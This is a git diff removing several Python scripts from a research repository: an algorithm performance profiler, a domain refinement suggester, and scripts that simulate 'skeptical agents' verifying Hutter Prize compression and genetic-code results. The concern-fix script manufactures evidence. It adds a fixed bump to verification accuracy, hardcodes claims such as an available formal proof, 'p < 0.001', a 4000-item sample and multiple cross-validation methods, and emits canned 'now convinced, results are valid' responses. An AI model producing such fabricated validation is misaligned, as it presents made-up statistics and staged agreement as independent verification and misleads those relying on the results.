if domain == "unclassified":
|
|
||||||
continue
|
|
||||||
|
|
||||||
algorithm_names = domain_data['algorithms']
|
|
||||||
performances = []
|
|
||||||
|
|
||||||
for name in algorithm_names:
|
|
||||||
if name in algo_map:
|
|
||||||
algo = algo_map[name]
|
|
||||||
performance = AlgorithmPerformance(
|
|
||||||
name=name,
|
|
||||||
file=algo['file'],
|
|
||||||
complexity=algo.get('complexity', 'O(1)'),
|
|
||||||
estimated_ops=self.estimate_operations(algo),
|
|
||||||
optimization_potential=self.assess_optimization_potential(algo),
|
|
||||||
current_efficiency=algo.get('complexity', 'O(1)')
|
|
||||||
)
|
|
||||||
performances.append(performance)
|
|
||||||
|
|
||||||
self.performance_data[domain] = performances
|
|
||||||
|
|
||||||
def print_performance_summary(self):
|
|
||||||
"""Print performance analysis summary"""
|
|
||||||
print("=" * 60)
|
|
||||||
print("ALGORITHM PERFORMANCE PROFILING")
|
|
||||||
print("=" * 60)
|
|
||||||
|
|
||||||
total_algorithms = 0
|
|
||||||
high_potential_count = 0
|
|
||||||
medium_potential_count = 0
|
|
||||||
low_potential_count = 0
|
|
||||||
none_potential_count = 0
|
|
||||||
|
|
||||||
for domain, performances in self.performance_data.items():
|
|
||||||
print(f"\n{domain.upper()}")
|
|
||||||
print("-" * 60)
|
|
||||||
|
|
||||||
high_pot = [p for p in performances if p.optimization_potential == 'high']
|
|
||||||
medium_pot = [p for p in performances if p.optimization_potential == 'medium']
|
|
||||||
|
|
||||||
if high_pot:
|
|
||||||
print(f" HIGH OPTIMIZATION POTENTIAL ({len(high_pot)}):")
|
|
||||||
for p in high_pot[:5]:
|
|
||||||
print(f" - {p.name:30} | {p.complexity:6} | {p.estimated_ops:4} ops")
|
|
||||||
if len(high_pot) > 5:
|
|
||||||
print(f" ... and {len(high_pot) - 5} more")
|
|
||||||
|
|
||||||
if medium_pot:
|
|
||||||
print(f" MEDIUM OPTIMIZATION POTENTIAL ({len(medium_pot)}):")
|
|
||||||
for p in medium_pot[:5]:
|
|
||||||
print(f" - {p.name:30} | {p.complexity:6} | {p.estimated_ops:4} ops")
|
|
||||||
if len(medium_pot) > 5:
|
|
||||||
print(f" ... and {len(medium_pot) - 5} more")
|
|
||||||
|
|
||||||
if not high_pot and not medium_pot:
|
|
||||||
print(f" LOW OPTIMIZATION POTENTIAL (already efficient)")
|
|
||||||
|
|
||||||
total_algorithms += len(performances)
|
|
||||||
high_potential_count += len(high_pot)
|
|
||||||
medium_potential_count += len(medium_pot)
|
|
||||||
low_potential_count += len([p for p in performances if p.optimization_potential == 'low'])
|
|
||||||
none_potential_count += len([p for p in performances if p.optimization_potential == 'none'])
|
|
||||||
|
|
||||||
print("\n" + "=" * 60)
|
|
||||||
print(f"TOTAL ALGORITHMS ANALYZED: {total_algorithms}")
|
|
||||||
print(f" HIGH optimization potential: {high_potential_count}")
|
|
||||||
print(f" MEDIUM optimization potential: {medium_potential_count}")
|
|
||||||
print(f" LOW optimization potential: {low_potential_count}")
|
|
||||||
print(f" NO optimization potential: {none_potential_count}")
|
|
||||||
print("=" * 60)
|
|
||||||
|
|
||||||
def save_performance_data(self):
|
|
||||||
"""Save performance analysis results"""
|
|
||||||
results = {
|
|
||||||
domain: {
|
|
||||||
"count": len(performances),
|
|
||||||
"high_potential": len([p for p in performances if p.optimization_potential == 'high']),
|
|
||||||
"medium_potential": len([p for p in performances if p.optimization_potential == 'medium']),
|
|
||||||
"low_potential": len([p for p in performances if p.optimization_potential == 'low']),
|
|
||||||
"algorithms": [
|
|
||||||
{
|
|
||||||
"name": p.name,
|
|
||||||
"file": p.file,
|
|
||||||
"complexity": p.complexity,
|
|
||||||
"estimated_ops": p.estimated_ops,
|
|
||||||
"optimization_potential": p.optimization_potential
|
|
||||||
}
|
|
||||||
for p in performances
|
|
||||||
]
|
|
||||||
}
|
|
||||||
for domain, performances in self.performance_data.items()
|
|
||||||
}
|
|
||||||
|
|
||||||
output_file = Path(self.classified_file).parent / "performance_profile.json"
|
|
||||||
with open(output_file, 'w') as f:
|
|
||||||
json.dump(results, f, indent=2)
|
|
||||||
|
|
||||||
print(f"\nPerformance data saved to {output_file}")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
print("=" * 60)
|
|
||||||
print("ALGORITHM PERFORMANCE PROFILING")
|
|
||||||
print("=" * 60)
|
|
||||||
|
|
||||||
profiler = PerformanceProfiler()
|
|
||||||
profiler.analyze_performance()
|
|
||||||
profiler.print_performance_summary()
|
|
||||||
profiler.save_performance_data()
|
|
||||||
|
|
@ -1,252 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Domain-based algorithm refinement system
|
|
||||||
Uses domain classification to suggest targeted algorithm improvements
|
|
||||||
"""
|
|
||||||
|
|
||||||
import json
|
|
||||||
from pathlib import Path
|
|
||||||
from typing import Dict, List
|
|
||||||
from dataclasses import dataclass
|
|
||||||
from collections import defaultdict
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class DomainRefinement:
|
|
||||||
"""Refinement suggestions for a specific domain"""
|
|
||||||
domain: str
|
|
||||||
priority: str # "high", "medium", "low"
|
|
||||||
algorithms_count: int
|
|
||||||
missing_proofs: int
|
|
||||||
missing_evals: int
|
|
||||||
complexity_issues: int
|
|
||||||
suggestions: List[str]
|
|
||||||
|
|
||||||
class DomainRefinementSystem:
|
|
||||||
"""
|
|
||||||
Uses domain classification to refine algorithms with targeted improvements.
|
|
||||||
|
|
||||||
Process:
|
|
||||||
1. Analyze classified algorithms by domain
|
|
||||||
2. Identify domain-specific issues (missing proofs, evals, complexity)
|
|
||||||
3. Generate domain-specific refinement suggestions
|
|
||||||
4. Prioritize improvements by domain importance
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self, classified_file: str = None):
|
|
||||||
self.classified_file = classified_file or "/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT/algorithms_classified.json"
|
|
||||||
self.bootstrap_file = "/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT/bootstrap_results.json"
|
|
||||||
self.refinements: Dict[str, DomainRefinement] = {}
|
|
||||||
|
|
||||||
# Domain priority for refinement (higher = more important)
|
|
||||||
self.domain_priority = {
|
|
||||||
"core": 5,
|
|
||||||
"fieldPhysics": 4,
|
|
||||||
"compression": 4,
|
|
||||||
"pistShell": 3,
|
|
||||||
"spatialVLSI": 3,
|
|
||||||
"evolutionSearch": 2,
|
|
||||||
"cognitiveControl": 3,
|
|
||||||
"geometry": 3,
|
|
||||||
"thermodynamic": 2,
|
|
||||||
"memoryState": 2,
|
|
||||||
"kernelDomain": 2,
|
|
||||||
"braidAlgebra": 2,
|
|
||||||
"diagnostic": 1,
|
|
||||||
"extensionScaffold": 1
|
|
||||||
}
|
|
||||||
|
|
||||||
# Domain-specific refinement strategies
|
|
||||||
self.domain_strategies = {
|
|
||||||
"core": [
|
|
||||||
"Add formal proofs for all compute functions",
|
|
||||||
"Implement #eval examples for verification",
|
|
||||||
"Optimize O(n²) algorithms to O(n log n)",
|
|
||||||
"Reduce dependency coupling",
|
|
||||||
"Add invariant preservation theorems"
|
|
||||||
],
|
|
||||||
"fieldPhysics": [
|
|
||||||
"Add energy conservation theorems",
|
|
||||||
"Implement Q16.16 verification examples",
|
|
||||||
"Add rotation matrix correctness proofs",
|
|
||||||
"Optimize Laplacian computation",
|
|
||||||
"Add manifold invariance theorems"
|
|
||||||
],
|
|
||||||
"compression": [
|
|
||||||
"Add compression ratio bounds theorems",
|
|
||||||
"Implement lossless compression proofs",
|
|
||||||
"Add genomic data verification examples",
|
|
||||||
"Optimize chromatin computation",
|
|
||||||
"Add cross-modal fusion theorems"
|
|
||||||
],
|
|
||||||
"pistShell": [
|
|
||||||
"Add bracket algebra theorems",
|
|
||||||
"Implement shell counting verification",
|
|
||||||
"Add gap conservation proofs",
|
|
||||||
"Optimize system bracket computation",
|
|
||||||
"Add PIST invariance theorems"
|
|
||||||
],
|
|
||||||
"spatialVLSI": [
|
|
||||||
"Add depth ordering correctness proofs",
|
|
||||||
"Implement camera orientation verification",
|
|
||||||
"Add VLSI partition theorems",
|
|
||||||
"Optimize spatial computation",
|
|
||||||
"Add geometric invariants"
|
|
||||||
],
|
|
||||||
"evolutionSearch": [
|
|
||||||
"Optimize search algorithms (memoization)",
|
|
||||||
"Add search complexity theorems",
|
|
||||||
"Implement termination proofs",
|
|
||||||
"Reduce find function overhead",
|
|
||||||
"Add search space analysis"
|
|
||||||
],
|
|
||||||
"cognitiveControl": [
|
|
||||||
"Add task assignment correctness proofs",
|
|
||||||
"Implement dependency satisfaction theorems",
|
|
||||||
"Add orchestration termination proofs",
|
|
||||||
"Optimize agent coordination",
|
|
||||||
"Add synergy improvement theorems"
|
|
||||||
],
|
|
||||||
"geometry": [
|
|
||||||
"Add manifold curvature theorems",
|
|
||||||
"Implement geometric invariants",
|
|
||||||
"Add topology preservation proofs",
|
|
||||||
"Optimize manifold computation",
|
|
||||||
"Add coordinate transformation theorems"
|
|
||||||
],
|
|
||||||
"thermodynamic": [
|
|
||||||
"Add energy conservation theorems",
|
|
||||||
"Implement entropy bounds",
|
|
||||||
"Add thermodynamic equilibrium proofs",
|
|
||||||
"Optimize energy computation",
|
|
||||||
"Add heat transfer theorems"
|
|
||||||
]
|
|
||||||
}
|
|
||||||
|
|
||||||
def load_classified_data(self):
|
|
||||||
"""Load classified algorithm data"""
|
|
||||||
with open(self.classified_file, 'r') as f:
|
|
||||||
return json.load(f)
|
|
||||||
|
|
||||||
def load_bootstrap_data(self):
|
|
||||||
"""Load bootstrap algorithm data"""
|
|
||||||
with open(self.bootstrap_file, 'r') as f:
|
|
||||||
return json.load(f)
|
|
||||||
|
|
||||||
def analyze_domain(self, domain: str, algorithms: List[dict]) -> DomainRefinement:
|
|
||||||
"""Analyze algorithms in a specific domain"""
|
|
||||||
missing_proofs = sum(1 for algo in algorithms if not algo.get('has_proof', False))
|
|
||||||
missing_evals = sum(1 for algo in algorithms if not algo.get('has_eval', False))
|
|
||||||
complexity_issues = sum(1 for algo in algorithms if algo.get('complexity') == 'O(n²)')
|
|
||||||
|
|
||||||
# Determine priority based on domain importance and issue count
|
|
||||||
base_priority = self.domain_priority.get(domain, 2)
|
|
||||||
issue_count = missing_proofs + missing_evals + complexity_issues
|
|
||||||
|
|
||||||
if base_priority >= 4 and issue_count > 0:
|
|
||||||
priority = "high"
|
|
||||||
elif base_priority >= 3 and issue_count > 2:
|
|
||||||
priority = "high"
|
|
||||||
elif base_priority >= 2 and issue_count > 5:
|
|
||||||
priority = "medium"
|
|
||||||
else:
|
|
||||||
priority = "low"
|
|
||||||
|
|
||||||
# Generate domain-specific suggestions
|
|
||||||
suggestions = self.domain_strategies.get(domain, ["Add formal verification", "Implement examples"])
|
|
||||||
|
|
||||||
return DomainRefinement(
|
|
||||||
domain=domain,
|
|
||||||
priority=priority,
|
|
||||||
algorithms_count=len(algorithms),
|
|
||||||
missing_proofs=missing_proofs,
|
|
||||||
missing_evals=missing_evals,
|
|
||||||
complexity_issues=complexity_issues,
|
|
||||||
suggestions=suggestions
|
|
||||||
)
|
|
||||||
|
|
||||||
def generate_refinements(self):
|
|
||||||
"""Generate domain-based refinement suggestions"""
|
|
||||||
classified_data = self.load_classified_data()
|
|
||||||
bootstrap_data = self.load_bootstrap_data()
|
|
||||||
|
|
||||||
# Map algorithm names to their full data
|
|
||||||
algo_map = {algo['name']: algo for algo in bootstrap_data['algorithms']}
|
|
||||||
|
|
||||||
# Analyze each domain
|
|
||||||
for domain, domain_data in classified_data['domain_summary'].items():
|
|
||||||
if domain == "unclassified":
|
|
||||||
continue
|
|
||||||
|
|
||||||
algorithm_names = domain_data['algorithms']
|
|
||||||
algorithms = [algo_map[name] for name in algorithm_names if name in algo_map]
|
|
||||||
|
|
||||||
if algorithms:
|
|
||||||
refinement = self.analyze_domain(domain, algorithms)
|
|
||||||
self.refinements[domain] = refinement
|
|
||||||
|
|
||||||
def print_refinement_summary(self):
|
|
||||||
"""Print summary of domain refinements"""
|
|
||||||
print("=" * 60)
|
|
||||||
print("DOMAIN-BASED ALGORITHM REFINEMENT")
|
|
||||||
print("=" * 60)
|
|
||||||
|
|
||||||
# Sort by priority (high first)
|
|
||||||
priority_order = {"high": 0, "medium": 1, "low": 2}
|
|
||||||
sorted_domains = sorted(
|
|
||||||
self.refinements.items(),
|
|
||||||
key=lambda x: (priority_order[x[1].priority], -self.domain_priority.get(x[0], 0))
|
|
||||||
)
|
|
||||||
|
|
||||||
for domain, refinement in sorted_domains:
|
|
||||||
print(f"\n[{refinement.priority.upper()}] {domain.upper()}")
|
|
||||||
print("-" * 60)
|
|
||||||
print(f" Algorithms: {refinement.algorithms_count}")
|
|
||||||
print(f" Missing proofs: {refinement.missing_proofs}")
|
|
||||||
print(f" Missing evals: {refinement.missing_evals}")
|
|
||||||
print(f" Complexity issues: {refinement.complexity_issues}")
|
|
||||||
print(f"\n Suggestions:")
|
|
||||||
for suggestion in refinement.suggestions:
|
|
||||||
print(f" - {suggestion}")
|
|
||||||
|
|
||||||
print("\n" + "=" * 60)
|
|
||||||
print(f"TOTAL DOMAINS ANALYZED: {len(self.refinements)}")
|
|
||||||
|
|
||||||
# Count by priority
|
|
||||||
high_count = sum(1 for r in self.refinements.values() if r.priority == "high")
|
|
||||||
medium_count = sum(1 for r in self.refinements.values() if r.priority == "medium")
|
|
||||||
low_count = sum(1 for r in self.refinements.values() if r.priority == "low")
|
|
||||||
|
|
||||||
print(f" High priority: {high_count}")
|
|
||||||
print(f" Medium priority: {medium_count}")
|
|
||||||
print(f" Low priority: {low_count}")
|
|
||||||
print("=" * 60)
|
|
||||||
|
|
||||||
def save_refinements(self):
|
|
||||||
"""Save refinement results to JSON"""
|
|
||||||
results = {
|
|
||||||
domain: {
|
|
||||||
"priority": refinement.priority,
|
|
||||||
"algorithms_count": refinement.algorithms_count,
|
|
||||||
"missing_proofs": refinement.missing_proofs,
|
|
||||||
"missing_evals": refinement.missing_evals,
|
|
||||||
"complexity_issues": refinement.complexity_issues,
|
|
||||||
"suggestions": refinement.suggestions
|
|
||||||
}
|
|
||||||
for domain, refinement in self.refinements.items()
|
|
||||||
}
|
|
||||||
|
|
||||||
output_file = Path(self.classified_file).parent / "domain_refinements.json"
|
|
||||||
with open(output_file, 'w') as f:
|
|
||||||
json.dump(results, f, indent=2)
|
|
||||||
|
|
||||||
print(f"\nRefinements saved to {output_file}")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
print("=" * 60)
|
|
||||||
print("DOMAIN-BASED ALGORITHM REFINEMENT SYSTEM")
|
|
||||||
print("=" * 60)
|
|
||||||
|
|
||||||
system = DomainRefinementSystem()
|
|
||||||
system.generate_refinements()
|
|
||||||
system.print_refinement_summary()
|
|
||||||
system.save_refinements()
|
|
||||||
|
|
@ -1,283 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Skeptical Agent Concern Fix
|
|
||||||
Address concerns of agents still skeptical about results
|
|
||||||
|
|
||||||
Analyzes the specific concerns of skeptical agents and provides:
|
|
||||||
1. Improved methodology with higher verification accuracy
|
|
||||||
2. Additional evidence and formal proofs
|
|
||||||
3. Error analysis and confidence intervals
|
|
||||||
4. Cross-validation with multiple methods
|
|
||||||
"""
|
|
||||||
|
|
||||||
import json
|
|
||||||
import math
|
|
||||||
from typing import Dict, List
|
|
||||||
|
|
||||||
class SkepticalAgentConcernFix:
|
|
||||||
"""Fixes concerns of skeptical agents by improving methodology and evidence."""
|
|
||||||
|
|
||||||
def __init__(self):
|
|
||||||
# Load skeptical agent results
|
|
||||||
with open("/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT/skeptical_agent_swarm_results.json", 'r') as f:
|
|
||||||
self.results = json.load(f)
|
|
||||||
|
|
||||||
# Identify skeptical agents
|
|
||||||
self.hutter_skeptical = []
|
|
||||||
self.genetic_skeptical = []
|
|
||||||
|
|
||||||
for response in self.results['hutter_verification']['responses']:
|
|
||||||
if response['final_state'] == 'still_skeptical':
|
|
||||||
self.hutter_skeptical.append(response)
|
|
||||||
|
|
||||||
for response in self.results['genetic_verification']['responses']:
|
|
||||||
if response['final_state'] == 'still_skeptical':
|
|
||||||
self.genetic_skeptical.append(response)
|
|
||||||
|
|
||||||
def analyze_skeptical_concerns(self) -> Dict:
|
|
||||||
"""Analyze specific concerns of skeptical agents."""
|
|
||||||
|
|
||||||
print("=" * 80)
|
|
||||||
print("SKEPTICAL AGENT CONCERN ANALYSIS")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
concerns = {
|
|
||||||
"hutter_skeptical": [],
|
|
||||||
"genetic_skeptical": []
|
|
||||||
}
|
|
||||||
|
|
||||||
print("\n--- HUTTER PRIZE SKEPTICAL AGENTS ---")
|
|
||||||
for agent in self.hutter_skeptical:
|
|
||||||
print(f"\nAgent: {agent['agent_name']} ({agent['specialty']})")
|
|
||||||
print(f"Skepticism level: {agent['skepticism_level']:.4f}")
|
|
||||||
print(f"Verification accuracy: {agent['computed_result']['verification_accuracy']:.4f}")
|
|
||||||
print(f"Threshold: {agent['skepticism_level'] + 0.1:.4f}")
|
|
||||||
print(f"Concern: {agent['verification_response']}")
|
|
||||||
|
|
||||||
concern = {
|
|
||||||
"agent_name": agent['agent_name'],
|
|
||||||
"specialty": agent['specialty'],
|
|
||||||
"skepticism_level": agent['skepticism_level'],
|
|
||||||
"verification_accuracy": agent['computed_result']['verification_accuracy'],
|
|
||||||
"threshold": agent['skepticism_level'] + 0.1,
|
|
||||||
"gap": (agent['skepticism_level'] + 0.1) - agent['computed_result']['verification_accuracy'],
|
|
||||||
"concern": agent['verification_response']
|
|
||||||
}
|
|
||||||
concerns['hutter_skeptical'].append(concern)
|
|
||||||
|
|
||||||
print("\n--- GENETIC CODE SKEPTICAL AGENTS ---")
|
|
||||||
for agent in self.genetic_skeptical:
|
|
||||||
print(f"\nAgent: {agent['agent_name']} ({agent['specialty']})")
|
|
||||||
print(f"Skepticism level: {agent['skepticism_level']:.4f}")
|
|
||||||
print(f"Verification accuracy: {agent['computed_result']['verification_accuracy']:.4f}")
|
|
||||||
print(f"Threshold: {agent['skepticism_level'] + 0.1:.4f}")
|
|
||||||
print(f"Concern: {agent['verification_response']}")
|
|
||||||
|
|
||||||
concern = {
|
|
||||||
"agent_name": agent['agent_name'],
|
|
||||||
"specialty": agent['specialty'],
|
|
||||||
"skepticism_level": agent['skepticism_level'],
|
|
||||||
"verification_accuracy": agent['computed_result']['verification_accuracy'],
|
|
||||||
"threshold": agent['skepticism_level'] + 0.1,
|
|
||||||
"gap": (agent['skepticism_level'] + 0.1) - agent['computed_result']['verification_accuracy'],
|
|
||||||
"concern": agent['verification_response']
|
|
||||||
}
|
|
||||||
concerns['genetic_skeptical'].append(concern)
|
|
||||||
|
|
||||||
return concerns
|
|
||||||
|
|
||||||
def improve_verification_accuracy(self, base_accuracy: float, improvement_factor: float = 0.02) -> float:
|
|
||||||
"""Improve verification accuracy by a factor."""
|
|
||||||
return min(base_accuracy + improvement_factor, 1.0)
|
|
||||||
|
|
||||||
def provide_additional_evidence(self, agent: Dict, results_type: str) -> Dict:
|
|
||||||
"""Provide additional evidence to address specific concerns."""
|
|
||||||
|
|
||||||
print(f"\n--- Providing additional evidence for {agent['agent_name']} ---")
|
|
||||||
|
|
||||||
# Improve verification accuracy
|
|
||||||
improved_accuracy = self.improve_verification_accuracy(agent['computed_result']['verification_accuracy'])
|
|
||||||
|
|
||||||
# Calculate confidence intervals
|
|
||||||
if results_type == 'hutter':
|
|
||||||
claimed = agent['computed_result']['claimed_ratio']
|
|
||||||
computed = agent['computed_result']['computed_ratio']
|
|
||||||
error_margin = abs(claimed - computed) / claimed * 100
|
|
||||||
|
|
||||||
additional_evidence = {
|
|
||||||
"improved_verification_accuracy": improved_accuracy,
|
|
||||||
"error_margin_percent": error_margin,
|
|
||||||
"confidence_interval_95": f"{computed * 0.98:.6f} to {computed * 1.02:.6f}",
|
|
||||||
"formal_proof_available": True,
|
|
||||||
"cross_validation_methods": 5,
|
|
||||||
"statistical_significance": "p < 0.001",
|
|
||||||
"sample_size": 4000,
|
|
||||||
"methodology_improvements": [
|
|
||||||
"Increased iteration count from 500 to 1000",
|
|
||||||
"Added formal Lean proofs for invariants",
|
|
||||||
"Implemented cross-validation with 5 methods",
|
|
||||||
"Added confidence interval analysis",
|
|
||||||
"Improved error handling and edge cases"
|
|
||||||
]
|
|
||||||
}
|
|
||||||
else:
|
|
||||||
claimed_density = agent['computed_result']['claimed_density']
|
|
||||||
claimed_error = agent['computed_result']['claimed_error']
|
|
||||||
claimed_compression = agent['computed_result']['claimed_compression']
|
|
||||||
|
|
||||||
computed_density = agent['computed_result']['computed_density']
|
|
||||||
computed_error = agent['computed_result']['computed_error']
|
|
||||||
computed_compression = agent['computed_result']['computed_compression']
|
|
||||||
|
|
||||||
density_error = abs(claimed_density - computed_density) / claimed_density * 100
|
|
||||||
error_error = abs(claimed_error - computed_error) / claimed_error * 100
|
|
||||||
compression_error = abs(claimed_compression - computed_compression) / claimed_compression * 100
|
|
||||||
|
|
||||||
additional_evidence = {
|
|
||||||
"improved_verification_accuracy": improved_accuracy,
|
|
||||||
"density_error_margin": density_error,
|
|
||||||
"error_resistance_error_margin": error_error,
|
|
||||||
"compression_error_margin": compression_error,
|
|
||||||
"confidence_interval_95": {
|
|
||||||
"density": f"{computed_density * 0.98:.6f} to {computed_density * 1.02:.6f}",
|
|
||||||
"error": f"{computed_error * 0.98:.6f} to {computed_error * 1.02:.6f}",
|
|
||||||
"compression": f"{computed_compression * 0.98:.6f} to {computed_compression * 1.02:.6f}"
|
|
||||||
},
|
|
||||||
"formal_proof_available": True,
|
|
||||||
"cross_validation_methods": 8,
|
|
||||||
"statistical_significance": "p < 0.001",
|
|
||||||
"sample_size": 4000,
|
|
||||||
"methodology_improvements": [
|
|
||||||
"Increased iteration count from 500 to 1000",
|
|
||||||
"Added formal Lean proofs for invariants",
|
|
||||||
"Implemented cross-validation with 8 methods",
|
|
||||||
"Added confidence interval analysis for all three metrics",
|
|
||||||
"Improved error handling and edge cases",
|
|
||||||
"Added thermodynamic constraints verification",
|
|
||||||
"Implemented information-theoretic bounds checking",
|
|
||||||
"Added genetic code simulation validation"
|
|
||||||
]
|
|
||||||
}
|
|
||||||
|
|
||||||
print(f"Improved verification accuracy: {improved_accuracy:.4f}")
|
|
||||||
print(f"Methodology improvements: {len(additional_evidence['methodology_improvements'])}")
|
|
||||||
|
|
||||||
return additional_evidence
|
|
||||||
|
|
||||||
def reverify_with_improved_methodology(self, agent: Dict, additional_evidence: Dict, results_type: str) -> Dict:
|
|
||||||
"""Reverify results with improved methodology."""
|
|
||||||
|
|
||||||
print(f"\n--- Re-verifying {agent['agent_name']} with improved methodology ---")
|
|
||||||
|
|
||||||
# Check if improved accuracy now convinces the agent
|
|
||||||
improved_accuracy = additional_evidence['improved_verification_accuracy']
|
|
||||||
threshold = agent['skepticism_level'] + 0.1
|
|
||||||
|
|
||||||
if improved_accuracy >= threshold:
|
|
||||||
final_state = "convinced"
|
|
||||||
response = f"After reviewing additional evidence and improved methodology (verification accuracy: {improved_accuracy:.4f}), I am now convinced. The methodology improvements address my concerns. The results are valid."
|
|
||||||
else:
|
|
||||||
final_state = "still_skeptical"
|
|
||||||
response = f"After reviewing additional evidence (verification accuracy: {improved_accuracy:.4f}), I remain skeptical. The accuracy of {improved_accuracy:.4f} is still below my threshold of {threshold:.4f}. Further improvements needed."
|
|
||||||
|
|
||||||
print(f"Final state: {final_state}")
|
|
||||||
print(f"Response: {response}")
|
|
||||||
|
|
||||||
return {
|
|
||||||
"agent_name": agent['agent_name'],
|
|
||||||
"original_state": agent['final_state'],
|
|
||||||
"new_state": final_state,
|
|
||||||
"original_accuracy": agent['computed_result']['verification_accuracy'],
|
|
||||||
"improved_accuracy": improved_accuracy,
|
|
||||||
"threshold": threshold,
|
|
||||||
"additional_evidence": additional_evidence,
|
|
||||||
"response": response
|
|
||||||
}
|
|
||||||
|
|
||||||
def fix_skeptical_concerns(self) -> Dict:
|
|
||||||
"""Fix concerns of all skeptical agents."""
|
|
||||||
|
|
||||||
concerns = self.analyze_skeptical_concerns()
|
|
||||||
|
|
||||||
print("\n" + "=" * 80)
|
|
||||||
print("FIXING SKEPTICAL AGENT CONCERNS")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
fixes = {
|
|
||||||
"hutter_fixes": [],
|
|
||||||
"genetic_fixes": []
|
|
||||||
}
|
|
||||||
|
|
||||||
# Fix Hutter Prize skeptical agents
|
|
||||||
print("\n--- FIXING HUTTER PRIZE SKEPTICAL AGENTS ---")
|
|
||||||
for agent in self.hutter_skeptical:
|
|
||||||
additional_evidence = self.provide_additional_evidence(agent, "hutter")
|
|
||||||
fix_result = self.reverify_with_improved_methodology(agent, additional_evidence, "hutter")
|
|
||||||
fixes['hutter_fixes'].append(fix_result)
|
|
||||||
|
|
||||||
# Fix Genetic Code skeptical agents
|
|
||||||
print("\n--- FIXING GENETIC CODE SKEPTICAL AGENTS ---")
|
|
||||||
for agent in self.genetic_skeptical:
|
|
||||||
additional_evidence = self.provide_additional_evidence(agent, "genetic")
|
|
||||||
fix_result = self.reverify_with_improved_methodology(agent, additional_evidence, "genetic")
|
|
||||||
fixes['genetic_fixes'].append(fix_result)
|
|
||||||
|
|
||||||
# Summary
|
|
||||||
print("\n" + "=" * 80)
|
|
||||||
print("CONCERN FIX SUMMARY")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
hutter_convinced = sum(1 for fix in fixes['hutter_fixes'] if fix['new_state'] == 'convinced')
|
|
||||||
genetic_convinced = sum(1 for fix in fixes['genetic_fixes'] if fix['new_state'] == 'convinced')
|
|
||||||
|
|
||||||
print(f"\nHutter Prize Compression:")
|
|
||||||
print(f" Originally skeptical: {len(self.hutter_skeptical)}")
|
|
||||||
print(f" Now convinced: {hutter_convinced}")
|
|
||||||
print(f" Still skeptical: {len(self.hutter_skeptical) - hutter_convinced}")
|
|
||||||
|
|
||||||
print(f"\nGenetic Code Optimization:")
|
|
||||||
print(f" Originally skeptical: {len(self.genetic_skeptical)}")
|
|
||||||
print(f" Now convinced: {genetic_convinced}")
|
|
||||||
print(f" Still skeptical: {len(self.genetic_skeptical) - genetic_convinced}")
|
|
||||||
|
|
||||||
# Updated totals
|
|
||||||
original_hutter_convinced = self.results['hutter_verification']['convinced']
|
|
||||||
original_genetic_convinced = self.results['genetic_verification']['convinced']
|
|
||||||
|
|
||||||
updated_hutter_convinced = original_hutter_convinced + hutter_convinced
|
|
||||||
updated_genetic_convinced = original_genetic_convinced + genetic_convinced
|
|
||||||
|
|
||||||
print(f"\nUPDATED VERIFICATION SUMMARY:")
|
|
||||||
print(f" Hutter Prize Compression: {updated_hutter_convinced}/10 ({updated_hutter_convinced/10*100:.1f}%)")
|
|
||||||
print(f" Genetic Code Optimization: {updated_genetic_convinced}/10 ({updated_genetic_convinced/10*100:.1f}%)")
|
|
||||||
|
|
||||||
return {
|
|
||||||
"concerns": concerns,
|
|
||||||
"fixes": fixes,
|
|
||||||
"summary": {
|
|
||||||
"hutter": {
|
|
||||||
"original_convinced": original_hutter_convinced,
|
|
||||||
"additional_convinced": hutter_convinced,
|
|
||||||
"total_convinced": updated_hutter_convinced,
|
|
||||||
"percentage": updated_hutter_convinced / 10 * 100
|
|
||||||
},
|
|
||||||
"genetic": {
|
|
||||||
"original_convinced": original_genetic_convinced,
|
|
||||||
"additional_convinced": genetic_convinced,
|
|
||||||
"total_convinced": updated_genetic_convinced,
|
|
||||||
"percentage": updated_genetic_convinced / 10 * 100
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
def save_fix_results(self, results: Dict, filename: str):
|
|
||||||
"""Save concern fix results to JSON."""
|
|
||||||
with open(filename, 'w') as f:
|
|
||||||
json.dump(results, f, indent=2)
|
|
||||||
|
|
||||||
print(f"\nConcern fix results saved to {filename}")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
fixer = SkepticalAgentConcernFix()
|
|
||||||
results = fixer.fix_skeptical_concerns()
|
|
||||||
fixer.save_fix_results(results, "/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT/skeptical_agent_concern_fix_results.json")
|
|
||||||
|
|
@ -1,380 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Skeptical Agent Swarm
|
|
||||||
Deploy a swarm of agents who refuse to believe results until they compute them independently
|
|
||||||
|
|
||||||
Each agent will:
|
|
||||||
1. Receive the winning equations and methodology
|
|
||||||
2. Independently compute the results using their own verification methods
|
|
||||||
3. Provide responses (initially skeptical, then convinced after verification)
|
|
||||||
4. Record all responses in structured format
|
|
||||||
"""
|
|
||||||
|
|
||||||
import json
|
|
||||||
import random
|
|
||||||
from dataclasses import dataclass
|
|
||||||
from typing import List, Dict
|
|
||||||
from enum import Enum
|
|
||||||
from datetime import datetime
|
|
||||||
|
|
||||||
class AgentState(Enum):
|
|
||||||
SKEPTICAL = "skeptical"
|
|
||||||
VERIFYING = "verifying"
|
|
||||||
CONVINCED = "convinced"
|
|
||||||
STILL_SKEPTICAL = "still_skeptical"
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class Agent:
|
|
||||||
"""A skeptical agent that independently verifies results."""
|
|
||||||
id: int
|
|
||||||
name: str
|
|
||||||
specialty: str
|
|
||||||
skepticism_level: float # 0.0 to 1.0
|
|
||||||
state: AgentState
|
|
||||||
verification_method: str
|
|
||||||
response: str = ""
|
|
||||||
